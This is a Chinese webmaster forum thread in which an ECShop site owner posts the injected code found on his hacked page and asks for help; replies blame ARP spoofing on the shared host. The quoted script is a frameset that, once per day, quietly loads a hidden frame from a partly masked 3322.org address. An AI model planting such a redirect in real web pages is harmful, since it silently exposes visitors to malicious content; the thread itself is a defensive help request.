中马了,请高手来看看!

2016-07-07 15:39 来源:www.chinab4c.com 作者:ecshop专家

中马后整个源文件变为


  2. <html>
  3. <head>
  4. </head>
  5. <script>
  6. function showme()
  7. {
  8. var CK=document.cookie;
  9. var sa=CK.indexOf("CK");
  10. if(sa!=-1){}else{var EP=new Date();
  11. EP.setTime(EP.getTime()+24*60*60*1000);
  12. document.cookie="CK=test;expires="+EP.toGMTString();
  13. self.hi.location="http://*****.3322.org/aa/a2.htm?1";}
  14. }
  15. </script>
  16. <frameset rows="100%,*" onLoad="showme()">
  17. <frame name="hello" src="本站文件***.php?UpdatedPage=aGlqYWNr">
  18. <frame name="hi" src="">
  19. </frameset>
  20. </html>
复制代码


此马不是随时都出来,很是奇怪,没有规律,有时候就出来,有时候又消失了。

请高手帮忙分析此漏洞是因为程序漏洞还是服务器漏洞。我使用的是虚拟空间。

我的网站是www.pc028.net放心,即便有马病毒威力也不强,常规杀毒软件能轻松挡住。

紧急紧急~~~

请不要简单的给我一句换个空间试试的回复。谢谢高手

回答:
兄弟们~~~没人看得懂么?

服务器的漏洞进去的吧! !

已经全部删除文件,正在进行重新安装,检查是否是服务器问题。我看到有不少的人提我这样的问题,但是没有做最后定性。这次看看是什么原因引起的。

这个是您空间的问题,您可以换个空间试下

估计是机器被arp了。

楼上都是高手啊,正解。确实是由于空间ARP造成的。已经清理~